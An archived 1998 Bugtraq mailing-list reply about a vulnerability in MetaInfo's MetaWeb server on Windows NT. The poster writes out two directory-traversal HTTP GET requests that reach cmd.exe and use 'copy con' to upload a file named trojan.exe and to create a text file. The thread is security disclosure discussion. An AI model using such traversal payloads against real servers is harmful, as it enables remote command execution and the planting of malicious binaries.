Bugtraq mailing list archives
Re: Security vulnerabilities in MetaInfo products
From: pedward () WEBCOM COM (pedward () WEBCOM COM)
Date: Tue, 30 Jun 1998 13:18:02 -0700
The MetaWeb server allows the running of NT batch/CMD files (this is how some of the Sendmail remote configuring works); if an attacker was to upload or produce a standard NT batch file, he could run any program he wishes. -Jeff Forristal
Ya know, the days of old where we had to use the COPY command to edit the autoexec.bat come to mind: An application that uses the following command could potentially upload a binary to an NT server and run it: GET ../../winnt/system32/cmd.exe?/c+copy+/b+con+c:\temp\trojan.exe HTTP/1.0 Or if you want to create a text file: GET ../../winnt/system32/cmd.exe?/c+copy+con+c:\temp\trojan.txt HTTP/1.0 and terminate with a ^Z Theoretically the commands above should work for the sendmail case that Jeff explained. --Perry -- Perry Harrington System Software Engineer zelur xuniL () http://www.webcom.com perry.harrington () webcom com Think Blue. /\
Current thread:
- Re: Security vulnerabilities in MetaInfo products pedward () WEBCOM COM (Jun 30)